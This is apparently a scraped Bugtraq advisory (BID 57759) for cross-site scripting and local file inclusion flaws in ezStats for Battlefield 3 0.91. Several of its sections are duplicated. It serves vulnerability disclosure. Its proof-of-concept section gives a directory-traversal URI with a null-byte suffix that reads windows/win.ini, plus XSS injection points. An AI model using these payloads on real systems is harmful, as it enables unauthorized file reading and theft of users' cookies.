ezStats for Battlefield 3 Multiple Cross Site Scripting and Local File Include Vulnerabilities
BID:57759
Info
ezStats for Battlefield 3 Multiple Cross Site Scripting and Local File Include Vulnerabilities
| Bugtraq ID: | 57759 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 06 2013 12:00AM |
| Updated: | Feb 06 2013 12:00AM |
| Credit: | L0n3ly-H34rT |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
ezStats for Battlefield 3 Multiple Cross Site Scripting and Local File Include Vulnerabilities
ezStats for Battlefield 3 is prone to multiple cross-site scripting vulnerabilities and a local file include vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the web server process.
ezStats for Battlefield 3 0.91 is vulnerable; other versions may also be affected.
ezStats for Battlefield 3 is prone to multiple cross-site scripting vulnerabilities and a local file include vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the web server process.
ezStats for Battlefield 3 0.91 is vulnerable; other versions may also be affected.
Exploit / POC
ezStats for Battlefield 3 Multiple Cross Site Scripting and Local File Include Vulnerabilities
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/ezStats2/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
http://www.example.com/ezStats2/compare.php?common=[XSS]
http://www.example.com/ezStats2/compare.php?rankings=[XSS]
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/ezStats2/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
http://www.example.com/ezStats2/compare.php?common=[XSS]
http://www.example.com/ezStats2/compare.php?rankings=[XSS]
Solution / Fix
ezStats for Battlefield 3 Multiple Cross Site Scripting and Local File Include Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
ezStats for Battlefield 3 Multiple Cross Site Scripting and Local File Include Vulnerabilities
References:
References: